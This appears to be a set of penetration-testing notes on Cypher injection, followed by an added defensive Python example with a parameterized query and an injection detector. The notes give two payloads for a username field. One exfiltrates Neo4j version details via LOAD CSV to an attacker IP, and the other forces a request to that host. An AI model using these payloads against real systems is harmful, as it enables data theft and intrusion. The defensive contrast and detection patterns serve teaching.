Cypher Injection
- Refer to this article for exploiting Cypher injection.
- Use the payload below to confirm the Cypher injection in the username parameter:

```
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.14.49/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
```

- Use the payload below to get a hit on our machine. It calls getUrlStatusCode because the web page's code checks for a status code:

```
' return h.value as a UNION CALL custom.getUrlStatusCode('http://10.10.14.49:80') YIELD statusCode AS a RETURN a;//
```
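
A defender's view of the two payloads above, as an added example that is not from the original page: it contrasts string concatenation with a parameterized query and flags username values carrying the clauses these payloads depend on. The query template, labels and function names are hypothetical (the page does not show the application's query), and the sample values are constructed except for the second payload, which is quoted from the page.

```python
import re

# Hypothetical login query; the page does not show the application's real one.
UNSAFE_TEMPLATE = "MATCH (u:User)-[:SECRET]->(h:Hash) WHERE u.name = '{}' RETURN h.value AS hash"
SAFE_QUERY = "MATCH (u:User)-[:SECRET]->(h:Hash) WHERE u.name = $username RETURN h.value AS hash"

def build_unsafe(username):
    """Concatenation: the input becomes part of the Cypher text itself."""
    return UNSAFE_TEMPLATE.format(username)

def build_parameterized(username):
    """Constant query text; the input travels separately as a parameter map,
    which is what a Neo4j driver sends when given query parameters."""
    return SAFE_QUERY, {"username": username}

# Clauses the page's payloads depend on; none has a place in a username.
INDICATORS = {
    "call": re.compile(r"\bCALL\s+[\w.]+\s*\(", re.I),
    "load_csv": re.compile(r"\bLOAD\s+CSV\s+FROM\b", re.I),
    "union": re.compile(r"\bUNION\b", re.I),
    "trailing_comment": re.compile(r"//\s*$"),
}

def flag_username(value):
    """Return indicator names for a value that both closes the string literal
    and appends Cypher clauses. A lone apostrophe (o'brien) is not flagged."""
    if "'" not in value and '"' not in value:
        return []
    return sorted(n for n, rx in INDICATORS.items() if rx.search(value))

# Second payload quoted from the page; the other values are constructed samples.
PAGE_PAYLOAD = ("' return h.value as a UNION CALL custom.getUrlStatusCode("
                "'http://10.10.14.49:80') YIELD statusCode AS a RETURN a;//")
SAMPLES = ["alice", "o'brien", "union jack", PAGE_PAYLOAD]

def review(samples):
    """Map each logged username value to the indicators it triggers."""
    return {s: flag_username(s) for s in samples}

if __name__ == "__main__":
    for value, hits in review(SAMPLES).items():
        print(f"{'ALERT' if hits else 'ok':5} {hits} {value[:60]!r}")
    print(build_unsafe(PAGE_PAYLOAD))            # attacker text is now query text
    print(build_parameterized(PAGE_PAYLOAD)[0])  # query text is unchanged
```

The keyword check is a detection aid for logs and alerts; the fix is the parameterized form, where the query text stays constant whatever the username contains.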